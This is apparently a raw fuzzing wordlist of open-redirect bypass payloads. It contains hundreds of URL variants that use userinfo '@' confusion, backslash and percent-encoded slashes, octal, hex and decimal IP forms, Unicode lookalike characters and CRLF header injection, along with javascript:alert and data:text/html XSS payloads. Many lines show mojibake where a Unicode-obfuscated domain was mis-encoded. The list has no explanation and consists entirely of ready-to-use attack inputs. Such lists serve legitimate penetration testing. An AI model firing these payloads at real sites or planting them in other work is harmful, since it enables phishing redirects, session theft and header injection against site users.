//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.google.com/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.proviesec.medium.com/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.google.com/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.proviesec.medium.com/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦?
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@.www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@.www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\\@.www.google.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\\@.www.proviesec.medium.com
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.google.com/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.proviesec.medium.com/
//ï¹”@localdomain.pw
//ï¹”@www.google.com
//ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/216.58.214.206
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/\/\/example.com/
/\/\google.com
/\/example.com/
/\/google.com
/\/google.com/
/\/localdomain.pw/
/\/www.google.com/
/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\216.58.214.206
/example.com/%2f%2e%2e
/google.com/%2F..
/google.com/%2e%2e
/google.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http://google.com
/http://localdomain.pw
/http://www.google.com
/http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/example.com
/http:/google.com
/http:/localdomain.pw
/http:/www.google.com
/http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5cblackfan.ru/
/https:/%5cexample.com/
/https:/%5cgoogle.com/
/https:/%5clocaldomain.pw/
/https:/%5cwww.google.com/
/https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%09/example.com
/https://%5cexample.com
/https://%5cexample.com@google.com
/https://%5cgoogle.com
/https://%5clocaldomain.pw
/https://%5cwww.google.com
/https://%5cwww.google.com@google.com
/https://%5cwww.google.com@www.google.com
/https://%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5cwww.proviesec.medium.com@localdomain.pw
/https://%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https:///example.com@google.com/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///www.google.com@www.google.com/%2f%2e%2e
/https:///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
/https:///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https://example.com@google.com/
/https://example.com@google.com/%2e%2e
/https://example.com@google.com/%2f%2e%2e
/https://example.com@google.com/%2f..
/https://example.com@google.com/%2f.//example.com@google.com/%2f..
/https://google.com/
/https://google.com/%2e%2e
/https://google.com/%2f%2e%2e
/https://google.com/%2f..
/https://localdomain.pw/
/https://localdomain.pw/%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f..
/https://www.google.com/
/https://www.google.com/%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.google.com/%2f..
/https://www.google.com@google.com/
/https://www.google.com@google.com/%2f..
/https://www.google.com@www.google.com/
/https://www.google.com@www.google.com/%2e%2e
/https://www.google.com@www.google.com/%2f%2e%2e
/https://www.google.com@www.google.com/%2f..
/https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://www.proviesec.medium.com@localdomain.pw/
/https://www.proviesec.medium.com@localdomain.pw/%2e%2e
/https://www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
/https://www.proviesec.medium.com@localdomain.pw/%2f..
/https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:example.com
/javascript:alert(1)
/javascript:alert(1);
/localdomain.pw/%2f%2e%2e
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/www.google.com/%2f%2e%2e
/x:1/:///%01javascript:alert(document.cookie)/
/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/ã€±google.com
/ã€±localdomain.pw
/ã€±www.google.com
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µgoogle.com
/ã€µlocaldomain.pw
/ã€µwww.google.com
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚google.com
/ã‚localdomain.pw
/ã‚www.google.com
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼google.com
/ãƒ¼localdomain.pw
/ãƒ¼www.google.com
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°google.com
/ï½°localdomain.pw
/ï½°www.google.com
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
172.217.167.46
216.58.214.206
<>//google.com
<>//localdomain.pw
<>//www.google.com
<>//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>javascript:alert(1);
@google.com
@https://www.google.com
@localdomain.pw
@www.google.com
@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
HTTP://google.com
HtTP://google.com
HtTPs://google.com
Javas%26%2399;ript:alert(1)
Javascript://%E2%80%A9alert(618)
\/\/google.com/
\/\/localdomain.pw/
\/\/www.google.com/
\/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x20http://google.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
crlftest%0dLocation:https://google.com
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:www.google.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
data:www.proviesec.medium.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
google.com
hTTp://google.com
hthttp://tp://google.com
http%3A%2F%2Fwww.google.com
http:%0a%0dgoogle.com
http:%0a%0dlocaldomain.pw
http:%0a%0dwww.google.com
http:%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.localdomain.pw
http://.www.google.com
http://.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://3H6k7lIAiqjfNeN@www.google.com+@www.google.com/
http://3H6k7lIAiqjfNeN@www.google.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.google.com@www.google.com/
http://3H6k7lIAiqjfNeN@www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.google.comâº@www.google.com/
http://3H6k7lIAiqjfNeN@www.google.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.com+@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.com@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.comâº@localdomain.pw/
http://3H6k7lIAiqjfNeN@www.proviesec.medium.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://472.314.470.462
http://;@google.com
http://;@localdomain.pw
http://;@www.google.com
http://;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://XY>.7d8T\205pZM@www.google.com+@www.google.com/
http://XY>.7d8T\205pZM@www.google.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.google.com@www.google.com/
http://XY>.7d8T\205pZM@www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.google.comâº@www.google.com/
http://XY>.7d8T\205pZM@www.google.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.proviesec.medium.com+@localdomain.pw/
http://XY>.7d8T\205pZM@www.proviesec.medium.com+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.proviesec.medium.com@localdomain.pw/
http://XY>.7d8T\205pZM@www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.proviesec.medium.comâº@localdomain.pw/
http://XY>.7d8T\205pZM@www.proviesec.medium.comâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com%2egoogle.com/
http://example.com+&@google.com#+@example.com/
http://example.com:80%40google.com/
http://example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http://example.com@00330.3856078
http://example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http://example.com@3627734734
http://example.com@472.314.470.462
http://example.com@[::216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://google.com%23.example.com/
http://google.com%2f%2f.example.com/
http://google.com%3F.example.com/
http://google.com%5c%5c.example.com/
http://google.com:80#@example.com/
http://google.com:80#@www.google.com/
http://google.com:80?@example.com/
http://google.com:80?@www.google.com/
http://google.com\texample.com/
http://localdomain.pw%23.www.proviesec.medium.com/
http://localdomain.pw%2f%2f.www.proviesec.medium.com/
http://localdomain.pw%3F.www.proviesec.medium.com/
http://localdomain.pw%5c%5c.www.proviesec.medium.com/
http://localdomain.pw:80#@www.proviesec.medium.com/
http://localdomain.pw:80?@www.proviesec.medium.com/
http://localdomain.pw\twww.proviesec.medium.com/
http://www.google.com
http://www.google.com%23.www.google.com/
http://www.google.com%2ewww.google.com/
http://www.google.com%2eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.google.com%2f%2f.www.google.com/
http://www.google.com%3F.www.google.com/
http://www.google.com%5c%5c.www.google.com/
http://www.google.com+&@www.google.com#+@www.google.com/
http://www.google.com+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.google.com/
http://www.google.com:80#@www.google.com/
http://www.google.com:80%40www.google.com/
http://www.google.com:80%40â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.google.com:80?@www.google.com/
http://www.google.com@00330.00072.0000326.00000316
http://www.google.com@00330.0x3a.54990
http://www.google.com@00330.3856078
http://www.google.com@0330.072.0326.0316
http://www.google.com@0xd8.072.54990
http://www.google.com@0xd8.0x3a.0xd6.0xce
http://www.google.com@0xd8.3856078
http://www.google.com@0xd83ad6ce
http://www.google.com@3627734734
http://www.google.com@472.314.470.462
http://www.google.com@[::216.58.214.206]
http://www.google.com@[::ffff:216.58.214.206]
http://www.google.com\twww.google.com/
http://www.google.comâº&@www.google.com#âº@www.google.com/
http://www.google.comâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.google.com/
http://www.localdomain.pw\.www.proviesec.medium.com
http://www.proviesec.medium.com%2elocaldomain.pw/
http://www.proviesec.medium.com%2eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.proviesec.medium.com+&@localdomain.pw#+@www.proviesec.medium.com/
http://www.proviesec.medium.com+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.proviesec.medium.com/
http://www.proviesec.medium.com:80%40localdomain.pw/
http://www.proviesec.medium.com:80%40â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.proviesec.medium.com@00330.00072.0000326.00000316
http://www.proviesec.medium.com@00330.0x3a.54990
http://www.proviesec.medium.com@00330.3856078
http://www.proviesec.medium.com@0330.072.0326.0316
http://www.proviesec.medium.com@0xd8.072.54990
http://www.proviesec.medium.com@0xd8.0x3a.0xd6.0xce
http://www.proviesec.medium.com@0xd8.3856078
http://www.proviesec.medium.com@0xd83ad6ce
http://www.proviesec.medium.com@3627734734
http://www.proviesec.medium.com@472.314.470.462
http://www.proviesec.medium.com@[::216.58.214.206]
http://www.proviesec.medium.com@[::ffff:216.58.214.206]
http://www.proviesec.medium.comâº&@localdomain.pw#âº@www.proviesec.medium.com/
http://www.proviesec.medium.comâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.proviesec.medium.com/
http://www.www.google.com\.www.google.com
http://www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.google.com
http://www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.proviesec.medium.com
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.proviesec.medium.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.google.com/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.proviesec.medium.com/
http://ï¹”@localdomain.pw
http://ï¹”@www.google.com
http://ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/localdomain.pw
http:/www.google.com
http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:472.314.470.462
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com@00330.00072.0000326.00000316
http:example.com@00330.0x3a.54990
http:example.com@00330.3856078
http:example.com@0330.072.0326.0316
http:example.com@0xd8.072.54990
http:example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.3856078
http:example.com@0xd83ad6ce
http:example.com@3627734734
http:example.com@472.314.470.462
http:example.com@[::216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:localdomain.pw
http:www.google.com
http:www.google.com@00330.00072.0000326.00000316
http:www.google.com@00330.0x3a.54990
http:www.google.com@00330.3856078
http:www.google.com@0330.072.0326.0316
http:www.google.com@0xd8.072.54990
http:www.google.com@0xd8.0x3a.0xd6.0xce
http:www.google.com@0xd8.3856078
http:www.google.com@0xd83ad6ce
http:www.google.com@3627734734
http:www.google.com@472.314.470.462
http:www.google.com@[::216.58.214.206]
http:www.google.com@[::ffff:216.58.214.206]
http:www.proviesec.medium.com@00330.00072.0000326.00000316
http:www.proviesec.medium.com@00330.0x3a.54990
http:www.proviesec.medium.com@00330.3856078
http:www.proviesec.medium.com@0330.072.0326.0316
http:www.proviesec.medium.com@0xd8.072.54990
http:www.proviesec.medium.com@0xd8.0x3a.0xd6.0xce
http:www.proviesec.medium.com@0xd8.3856078
http:www.proviesec.medium.com@0xd83ad6ce
http:www.proviesec.medium.com@3627734734
http:www.proviesec.medium.com@472.314.470.462
http:www.proviesec.medium.com@[::216.58.214.206]
http:www.proviesec.medium.com@[::ffff:216.58.214.206]
http:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http\x3A\x2F\x2Fgoogle.com
https%3A%2F%2Fwww.google.com
https%3A/:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.google.com
https%3A/:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.proviesec.medium.com
https%3A/;@localdomain.pw
https%3A/;@www.google.com
https%3A/localdomain.pw
https%3A/www.google.com
https%3A/www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.google.com
https%3A/www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.www.proviesec.medium.com
https%3A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.google.com/
https%3A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.www.proviesec.medium.com/
https%3A/ï¹”@localdomain.pw
https%3A/ï¹”@www.google.com
https:/%5clocaldomain.pw/
https:/%5cwww.google.com/
https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%09/example.com@google.com
https://%09/google.com
https://%09/localdomain.pw
https://%09/www.google.com
https://%09/www.google.com@google.com
https://%09/www.google.com@www.google.com
https://%09/www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/www.proviesec.medium.com@localdomain.pw
https://%09/www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dlocaldomain.pw
https://%0a%0dwww.google.com
https://%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cexample.com@google.com
https://%5cgoogle.com
https://%5clocaldomain.pw
https://%5cwww.google.com
https://%5cwww.google.com@google.com
https://%5cwww.google.com@www.google.com
https://%5cwww.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cwww.proviesec.medium.com@localdomain.pw
